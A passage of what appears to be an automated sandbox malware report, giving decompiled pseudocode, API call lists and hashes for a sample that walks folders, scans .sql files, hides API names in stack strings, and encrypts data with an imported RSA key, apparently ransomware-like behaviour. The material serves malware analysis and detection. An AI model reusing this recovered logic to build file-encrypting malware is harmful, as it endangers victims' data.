                                    				WCHAR* _t66;
                                    				void* _t67;
                                    
                                    				_t66 = __ecx;
                                    				_v16 = __ecx;
                                    				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                    				_v20 = _t52;
                                    				lstrcatW(_t66, "*");
                                    				_v8 = FindFirstFileW(_t66,  &_v620);
                                    				 *_t52 = 0;
                                    				_t53 = 0;
                                    				do {
                                    					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                    						goto L20;
                                    					} else {
                                    						lstrcatW(_t66,  &(_v620.cFileName));
                                    						_t38 = lstrlenW(_t66);
                                    						_t10 = _t38 - 1; // -1
                                    						_t57 =  &(_t66[_t10]);
                                    						if(_t38 == 0) {
                                    							L18:
                                    							_t53 = 0;
                                    							goto L19;
                                    						} else {
                                    							while( *_t57 != 0x2e) {
                                    								_t57 = _t57 - 2;
                                    								_t38 = _t38 - 1;
                                    								if(_t38 != 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							if(_t38 == 0) {
                                    								goto L18;
                                    							} else {
                                    								_t40 = lstrcmpW(_t57, L".sql");
                                    								if(_t40 != 0) {
                                    									goto L18;
                                    								} else {
                                    									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                    									_t64 = GetFileSize(_t54, 0);
                                    									_v12 = 0;
                                    									if(_t64 < 0x40000000) {
                                    										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                    										if(_t67 != 0) {
                                    											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F588260(_t67, "*******************") != 0) {
                                    												_t50 = lstrlenA("*******************");
                                    												_t15 = _t67 + 1; // 0x1
                                    												_v12 = E0F586B40(_t15 + _t50);
                                    											}
                                    											VirtualFree(_t67, 0, 0x8000);
                                    										}
                                    										_t66 = _v16;
                                    									}
                                    									CloseHandle(_t54);
                                    									_t53 = _v12;
                                    									if(_t53 == 0) {
                                    										L19:
                                    										 *_v20 = 0;
                                    										goto L20;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					break;
                                    					L20:
                                    				} while (FindNextFileW(_v8,  &_v620) != 0);
                                    				FindClose(_v8);
                                    				return _t53;
                                    			}



















                                    0x0f586bab
                                    0x0f586baf
                                    0x0f586bbe
                                    0x0f586bc1
                                    0x0f586bc4
                                    0x0f586bde
                                    0x0f586be3
                                    0x0f586be6
                                    0x0f586bf0
                                    0x0f586c00
                                    0x00000000
                                    0x0f586c1c
                                    0x0f586c24
                                    0x0f586c2b
                                    0x0f586c31
                                    0x0f586c34
                                    0x0f586c39
                                    0x0f586d08
                                    0x0f586d08
                                    0x00000000
                                    0x0f586c40
                                    0x0f586c40
                                    0x0f586c46
                                    0x0f586c49
                                    0x0f586c4a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586c4a
                                    0x0f586c4e
                                    0x00000000
                                    0x0f586c54
                                    0x0f586c5a
                                    0x0f586c5e
                                    0x00000000
                                    0x0f586c64
                                    0x0f586c77
                                    0x0f586c82
                                    0x0f586c86
                                    0x0f586c8f
                                    0x0f586ca0
                                    0x0f586ca4
                                    0x0f586cb7
                                    0x0f586cce
                                    0x0f586cd4
                                    0x0f586cde
                                    0x0f586cde
                                    0x0f586ce9
                                    0x0f586ce9
                                    0x0f586cef
                                    0x0f586cef
                                    0x0f586cf3
                                    0x0f586cf9
                                    0x0f586cfe
                                    0x0f586d0a
                                    0x0f586d0f
                                    0x00000000
                                    0x0f586d0f
                                    0x0f586cfe
                                    0x0f586c5e
                                    0x0f586c4e
                                    0x0f586c39
                                    0x00000000
                                    0x0f586d12
                                    0x0f586d22
                                    0x0f586d2d
                                    0x0f586d3b

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
                                    • lstrcatW.KERNEL32 ref: 0F586BC4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
                                    • lstrcatW.KERNEL32 ref: 0F586C24
                                    • lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
                                    • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
                                    • lstrlenA.KERNEL32(*******************,?,?), ref: 0F586CCE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586CE9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 0F586CF3
                                    • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F586D1C
                                    • FindClose.KERNEL32(?,?,?), ref: 0F586D2D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                    • String ID: *******************$.sql
                                    • API String ID: 3616287438-58436570
                                    • Opcode ID: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
                                    • Instruction ID: 1599c5dc599c77c2f50f7025807eb1bc4c5c8c6536f040296bb1e9d9b3eb5869
                                    • Opcode Fuzzy Hash: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
                                    • Instruction Fuzzy Hash: 67418F31601216BBDB10BB60DD48FAA7BACFF04711F505076E902F6241EB78AA17DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E0F588400(intOrPtr __ecx, intOrPtr __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t25;
                                    				struct HINSTANCE__* _t33;
                                    				_Unknown_base(*)()* _t34;
                                    				long _t40;
                                    				void* _t42;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t48;
                                    
                                    				_t46 = 0;
                                    				_v16 = __ecx;
                                    				_t25 =  &_v8;
                                    				_v12 = __edx;
                                    				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
                                    				if(_t25 == 0) {
                                    					L10:
                                    					return _t46;
                                    				} else {
                                    					_t42 = 0;
                                    					do {
                                    						_t4 = _t42 + 0x61; // 0x61
                                    						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                    						_t42 = _t42 + 1;
                                    					} while (_t42 < 0x1a);
                                    					_t40 = __edx + 1;
                                    					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                    					if(_t47 == 0 || _v12 >= _t40) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t33 = GetModuleHandleA( &_v32);
                                    						if(_t33 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t34 = GetProcAddress(_t33, _t19);
                                    							if(_t34 != 0) {
                                    								 *_t34(_v8, _v12, _v16);
                                    								_t46 =  !=  ? 1 : _t46;
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t33 = LoadLibraryA(_t18);
                                    							if(_t33 != 0) {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000);
                                    						goto L10;
                                    					}
                                    				}
                                    			}























                                    0x0f588410
                                    0x0f588412
                                    0x0f588417
                                    0x0f58841d
                                    0x0f588420
                                    0x0f588428
                                    0x0f5884f2
                                    0x0f5884fa
                                    0x0f58842e
                                    0x0f58842e
                                    0x0f588430
                                    0x0f588430
                                    0x0f588433
                                    0x0f588437
                                    0x0f588438
                                    0x0f588444
                                    0x0f58844e
                                    0x0f588452
                                    0x0f588500
                                    0x0f58850e
                                    0x0f58851c
                                    0x0f588461
                                    0x0f588464
                                    0x0f58846c
                                    0x0f588473
                                    0x0f58847a
                                    0x0f588480
                                    0x0f588484
                                    0x0f58848b
                                    0x0f588492
                                    0x0f588499
                                    0x0f58849d
                                    0x0f5884a5
                                    0x0f5884b5
                                    0x0f5884b5
                                    0x0f5884ba
                                    0x0f5884c2
                                    0x0f5884cd
                                    0x0f5884d6
                                    0x0f5884d6
                                    0x0f5884a7
                                    0x0f5884a7
                                    0x0f5884ab
                                    0x0f5884b3
                                    0x00000000
                                    0x00000000
                                    0x0f5884b3
                                    0x0f5884de
                                    0x0f5884ec
                                    0x00000000
                                    0x0f5884ec
                                    0x0f588452

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F588420
                                    • VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F588448
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F58849D
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F588500
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F58850E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
                                    • Instruction ID: c06f77bf9ffcd752874f0cfdc17745f53fecf6620f1a6133f364a53d8b8a4480
                                    • Opcode Fuzzy Hash: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
                                    • Instruction Fuzzy Hash: EE31E431A00208FFDB109FA5DD49BEEBF78FB04712F504069E601F2290D7789A169B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E0F586660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
                                    				long* _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				char _v20;
                                    				long _v24;
                                    				char _v28;
                                    				intOrPtr _v32;
                                    				long** _t26;
                                    				char* _t31;
                                    				int _t33;
                                    				long _t36;
                                    
                                    				EnterCriticalSection(0xf592a48);
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_t26 =  &_v8;
                                    				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
                                    				if(_t26 != 0) {
                                    					L6:
                                    					_v16 = 0;
                                    					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                    						_v20 = 0xa;
                                    						_t31 =  &_v20;
                                    						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
                                    						_v32 = _t31;
                                    						 *_a16 = 0xc8;
                                    						_t33 = _a12;
                                    						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
                                    						_v16 = _t33;
                                    						_v24 = GetLastError();
                                    						if(_v16 == 0) {
                                    							E0F5836C0(_t34);
                                    						}
                                    					}
                                    					CryptReleaseContext(_v8, 0);
                                    					LeaveCriticalSection(0xf592a48);
                                    					return _v16;
                                    				}
                                    				_t36 = GetLastError();
                                    				if(_t36 != 0x80090016) {
                                    					return 0;
                                    				}
                                    				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t36 != 0) {
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}














                                    0x0f58666b
                                    0x0f586671
                                    0x0f586678
                                    0x0f58668d
                                    0x0f586691
                                    0x0f586699
                                    0x0f5866d1
                                    0x0f5866d1
                                    0x0f5866f4
                                    0x0f5866f6
                                    0x0f5866ff
                                    0x0f58670d
                                    0x0f586713
                                    0x0f586719
                                    0x0f586727
                                    0x0f586735
                                    0x0f58673b
                                    0x0f586744
                                    0x0f58674b
                                    0x0f586750
                                    0x0f586750
                                    0x0f58674b
                                    0x0f58675b
                                    0x0f586766
                                    0x00000000
                                    0x0f58676c
                                    0x0f58669b
                                    0x0f5866a6
                                    0x00000000
                                    0x0f5866ca
                                    0x0f5866b7
                                    0x0f5866bf
                                    0x00000000
                                    0x0f5866c8
                                    0x00000000

                                    APIs
                                    • EnterCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000,00000000,?,00000800), ref: 0F58666B
                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F5838F4,00000000,00000000,00000000), ref: 0F586691
                                    • GetLastError.KERNEL32(?,0F5838F4,00000000,00000000,00000000), ref: 0F58669B
                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F5838F4,00000000,00000000,00000000), ref: 0F5866B7
                                    • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F5838F4,00000000,00000000), ref: 0F5866EC
                                    • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F5838F4,0000000A,00000000,?,0F5838F4,00000000), ref: 0F58670D
                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F5838F4,?,0F5838F4,00000000), ref: 0F586735
                                    • GetLastError.KERNEL32(?,0F5838F4,00000000), ref: 0F58673E
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F5838F4,00000000,00000000), ref: 0F58675B
                                    • LeaveCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000), ref: 0F586766
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 72144047-1948191093
                                    • Opcode ID: 2cef97383705ab7d79c4decc481899ad1412c6660178387924bc088b218a912b
                                    • Instruction ID: 8350dbd7eba1acb3fecb0e3823380b5ea66e2a3af09cd8d097ed905cfc74cae6
                                    • Opcode Fuzzy Hash: 2cef97383705ab7d79c4decc481899ad1412c6660178387924bc088b218a912b
                                    • Instruction Fuzzy Hash: 63316375A40305FBDB10EFA0DD45FAE7BB4BB48701F104558F601BA280D7B9AA059FA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F586DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                    				void* _v12;
                                    				intOrPtr _v16;
                                    				WCHAR* _v20;
                                    				intOrPtr _v24;
                                    				struct _WIN32_FIND_DATAW _v616;
                                    				void* _t35;
                                    				signed int _t37;
                                    				int _t39;
                                    				signed int _t42;
                                    				void* _t46;
                                    				signed int* _t48;
                                    				WCHAR* _t53;
                                    				intOrPtr* _t54;
                                    				short _t57;
                                    				WCHAR* _t63;
                                    				void* _t67;
                                    
                                    				_v24 = __edx;
                                    				_t63 = __ecx;
                                    				"SVWj@h"();
                                    				if(__eax == 0 || E0F586BA0(__ecx) != 0) {
                                    					L17:
                                    					__eflags = 0;
                                    					return 0;
                                    				} else {
                                    					E0F586D40(__ecx);
                                    					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                    					_v20 = _t53;
                                    					lstrcatW(_t63, "*");
                                    					_t35 = FindFirstFileW(_t63,  &_v616);
                                    					_t57 = 0;
                                    					_v12 = _t35;
                                    					 *_t53 = 0;
                                    					if(_t35 != 0xffffffff) {
                                    						_t54 = _a12;
                                    						do {
                                    							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                    							__eflags = _t37;
                                    							if(_t37 != 0) {
                                    								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                    								__eflags = _t42;
                                    								if(_t42 != 0) {
                                    									lstrcatW(_t63,  &(_v616.cFileName));
                                    									__eflags = _v616.dwFileAttributes & 0x00000010;
                                    									if(__eflags == 0) {
                                    										_v16 =  *_t54;
                                    										_t46 = E0F586AB0(_t63,  &_v616, __eflags, _t57, _a4);
                                    										_t67 = _t67 + 8;
                                    										 *_t54 =  *_t54 + _t46;
                                    										asm("adc [ebx+0x4], edx");
                                    										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                    										if(__eflags <= 0) {
                                    											if(__eflags < 0) {
                                    												L12:
                                    												_t48 = _a8;
                                    												 *_t48 =  *_t48 + 1;
                                    												__eflags =  *_t48;
                                    											} else {
                                    												__eflags = _v16 -  *_t54;
                                    												if(_v16 <  *_t54) {
                                    													goto L12;
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										E0F586DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                    										_t67 = _t67 + 0xc;
                                    									}
                                    									_t57 = 0;
                                    									__eflags = 0;
                                    									 *_v20 = 0;
                                    								}
                                    							}
                                    							_t39 = FindNextFileW(_v12,  &_v616);
                                    							__eflags = _t39;
                                    						} while (_t39 != 0);
                                    						FindClose(_v12);
                                    						goto L17;
                                    					} else {
                                    						return 0xdeadbeaf;
                                    					}
                                    				}
                                    			}



















                                    0x0f586dfc
                                    0x0f586dff
                                    0x0f586e01
                                    0x0f586e08
                                    0x0f586f36
                                    0x0f586f36
                                    0x0f586f3c
                                    0x0f586e1d
                                    0x0f586e1d
                                    0x0f586e35
                                    0x0f586e38
                                    0x0f586e3b
                                    0x0f586e45
                                    0x0f586e4b
                                    0x0f586e4d
                                    0x0f586e50
                                    0x0f586e56
                                    0x0f586e64
                                    0x0f586e70
                                    0x0f586e7c
                                    0x0f586e82
                                    0x0f586e84
                                    0x0f586e96
                                    0x0f586e9c
                                    0x0f586e9e
                                    0x0f586ea8
                                    0x0f586eaa
                                    0x0f586eb1
                                    0x0f586ee2
                                    0x0f586ee5
                                    0x0f586eea
                                    0x0f586eed
                                    0x0f586eef
                                    0x0f586ef2
                                    0x0f586ef5
                                    0x0f586ef7
                                    0x0f586f00
                                    0x0f586f00
                                    0x0f586f03
                                    0x0f586f03
                                    0x0f586ef9
                                    0x0f586efc
                                    0x0f586efe
                                    0x00000000
                                    0x00000000
                                    0x0f586efe
                                    0x0f586ef7
                                    0x0f586eb3
                                    0x0f586ec7
                                    0x0f586ecc
                                    0x0f586ecc
                                    0x0f586f0e
                                    0x0f586f0e
                                    0x0f586f10
                                    0x0f586f10
                                    0x0f586e9e
                                    0x0f586f1d
                                    0x0f586f23
                                    0x0f586f23
                                    0x0f586f2e
                                    0x00000000
                                    0x0f586e58
                                    0x0f586e63
                                    0x0f586e63
                                    0x0f586e56

                                    APIs
                                      • Part of subcall function 0F586780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
                                      • Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
                                      • Part of subcall function 0F586BA0: lstrcatW.KERNEL32 ref: 0F586BC4
                                      • Part of subcall function 0F586BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
                                      • Part of subcall function 0F586BA0: lstrcatW.KERNEL32 ref: 0F586C24
                                      • Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
                                      • Part of subcall function 0F586BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
                                      • Part of subcall function 0F586BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
                                      • Part of subcall function 0F586BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
                                      • Part of subcall function 0F586BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
                                      • Part of subcall function 0F586D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F586E22,00000000,?,?), ref: 0F586D55
                                      • Part of subcall function 0F586D40: wsprintfW.USER32 ref: 0F586D63
                                      • Part of subcall function 0F586D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F586D7F
                                      • Part of subcall function 0F586D40: GetLastError.KERNEL32(?,?), ref: 0F586D8C
                                      • Part of subcall function 0F586D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586DD8
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                    • lstrcatW.KERNEL32 ref: 0F586E3B
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
                                    • lstrcatW.KERNEL32 ref: 0F586EA8
                                    • lstrcatW.KERNEL32 ref: 0F586EB9
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
                                    • String ID:
                                    • API String ID: 664581897-0
                                    • Opcode ID: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
                                    • Instruction ID: 1921ea6ff382926096f9548d92552ca3f3b3b1a08fc4c7adfd421c56c616a185
                                    • Opcode Fuzzy Hash: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
                                    • Instruction Fuzzy Hash: 52319E31A00219EBCF11BF64DD849AEBBB8FF44311F0441A6E805F6202DB34AE16DB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F5834F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
                                    				int _v8;
                                    				CHAR* _v12;
                                    				WCHAR** _v16;
                                    				long _t11;
                                    				WCHAR* _t17;
                                    				WCHAR* _t18;
                                    				void* _t23;
                                    				void* _t28;
                                    				int _t29;
                                    				WCHAR** _t30;
                                    
                                    				_v16 = __edx;
                                    				_v12 = __ecx;
                                    				_t29 = 0;
                                    				_t11 = lstrlenA(__ecx);
                                    				_v8 = _t11;
                                    				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
                                    				if(_t23 != 0) {
                                    					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
                                    						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t30 = _v16;
                                    						 *_t30 = _t17;
                                    						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t28 = _t23;
                                    						 *_a4 = _t18;
                                    						if( *_t23 != 0x3b) {
                                    							do {
                                    								_t28 = _t28 + 1;
                                    							} while ( *_t28 != 0x3b);
                                    						}
                                    						 *_t28 = 0;
                                    						wsprintfW( *_t30, L"%S", _t23);
                                    						_t8 = _t28 + 1; // 0x2
                                    						wsprintfW( *_a4, L"%S", _t8);
                                    						_t29 = 1;
                                    					}
                                    					VirtualFree(_t23, 0, 0x8000);
                                    				}
                                    				return _t29;
                                    			}













                                    0x0f5834fa
                                    0x0f5834ff
                                    0x0f583502
                                    0x0f583504
                                    0x0f583519
                                    0x0f58351e
                                    0x0f583522
                                    0x0f58353d
                                    0x0f58354c
                                    0x0f58354e
                                    0x0f58355f
                                    0x0f583561
                                    0x0f583566
                                    0x0f58356b
                                    0x0f58356d
                                    0x0f583570
                                    0x0f583570
                                    0x0f583571
                                    0x0f583570
                                    0x0f583584
                                    0x0f583587
                                    0x0f583589
                                    0x0f583597
                                    0x0f58359c
                                    0x0f58359c
                                    0x0f5835a9
                                    0x0f5835a9
                                    0x0f5835b7

                                    APIs
                                    • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F583673,00000000), ref: 0F583504
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F583673,00000000), ref: 0F58351C
                                    • CryptStringToBinaryA.CRYPT32(0F583673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F583535
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F58354C
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F583561
                                    • wsprintfW.USER32 ref: 0F583587
                                    • wsprintfW.USER32 ref: 0F583597
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F583673,00000000), ref: 0F5835A9
                                    Memory Dump Source
